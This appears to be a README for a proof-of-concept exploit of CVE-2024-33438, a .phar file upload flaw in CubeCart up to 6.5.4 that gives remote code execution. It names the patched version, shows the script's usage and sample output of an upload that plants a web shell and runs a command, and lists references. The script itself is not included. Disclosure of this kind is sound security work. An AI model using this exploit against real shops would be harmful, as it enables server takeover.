# Arbitrary File Upload Leads to RCE (CVE-2024-33438)
CubeCart &lt;= 6.5.4 is vulnerable to an arbitrary file upload issue that leads to remote code execution (RCE). The vulnerability affects the application's file manager and its filters by allowing attackers to upload `.phar` files containing malicious code. CubeCart should be updated to 6.5.5 as it implements a security patch to fix this vulnerability.

For more details, please see the official announcement by CubeCart in the references.

## Exploit
An automated proof-of-concept (PoC) has been created, but this vulnerability can also be exploited manually by uploading a malicious `.phar` file via the file manager.

This is the usage of the PoC:
```
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>
```

After running it, this is the expected output for a successful exploitation:
```
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data
```

## References

* https://forums.cubecart.com/topic/59046-cubecart-655-released-minor-security-update/
* https://github.com/cubecart/v6/issues/3570
* https://github.com/cubecart/v6/commit/31a5ec39b0924b2111fbc3aa419bd8c5c3fc1841
* https://www.cve.org/CVERecord?id=CVE-2024-33438
* http://blog.cat22.io/blog/cve/cve-2024-33438.html
